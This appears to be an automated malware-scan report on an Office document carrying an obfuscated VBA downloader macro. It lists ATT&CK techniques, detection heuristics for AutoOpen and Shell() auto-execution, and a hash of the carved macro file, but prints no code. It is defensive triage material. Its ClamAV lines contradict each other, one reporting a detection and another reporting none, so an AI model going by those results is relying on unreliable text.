Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
This Office document contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes the Shell() function, indicating an attempt to run an external command. This strongly suggests the document is a downloader for a second-stage payload, though the specific payload and its destination are not directly evident from the provided script excerpt.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64105 bytes |

SHA-256: 0bb4c21df702c15d46b537f601181c90914c7350986ce181479e4aa068fc3341

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 118 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script